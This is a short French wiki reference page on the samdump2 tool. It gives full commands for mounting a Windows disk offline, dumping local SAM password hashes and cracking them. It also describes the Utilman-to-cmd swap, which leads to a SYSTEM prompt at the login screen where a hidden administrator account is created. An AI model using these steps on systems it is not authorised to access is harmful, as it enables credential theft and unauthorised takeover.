Samdump2

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Extraction offline de la SAM (Windows)
Type Utilitaire (obsolète)
Voir aussi Bkhive · SAM · NTLM

samdump2 extrait les empreintes (hash LM/NTLM) des comptes locaux depuis la ruche SAM d'une installation Windows, une fois la clé syskey récupérée avec Bkhive. S'utilise typiquement hors-ligne, disque monté depuis un live-CD/USB Linux.

Monter la partition Windows

fdisk -l
mkdir /mnt/windows
mount -t ntfs-3g /dev/sdXN /mnt/windows -o force

Extraire les hash

bkhive /mnt/windows/Windows/System32/config/system syskey.txt
samdump2 /mnt/windows/Windows/System32/config/system /mnt/windows/Windows/System32/config/sam > hash.txt

Les hash récupérés se cassent ensuite avec John the ripper ou Hashcat.

Alternative : réinitialisation directe du mot de passe

Plutôt que casser le hash, on peut aussi remplacer le raccourci d'accessibilité Utilman par un invite de commandes, pour créer un compte administrateur directement depuis l'écran de connexion — même prérequis (disque Windows monté hors-ligne) :

cd /mnt/windows/Windows/System32
mv utilman.exe utilman.exe.bak
cp cmd.exe utilman.exe

Au redémarrage, l'icône d'accessibilité de l'écran de connexion ouvre une invite de commandes système :

net user utilisateur1 /add
net user utilisateur1 MotDePasse123!
net localgroup administrateurs utilisateur1 /add

Cette technique de contournement (sticky keys/Utilman) est indépendante de samdump2 mais s'appuie sur le même prérequis d'accès physique au disque.

Voir aussi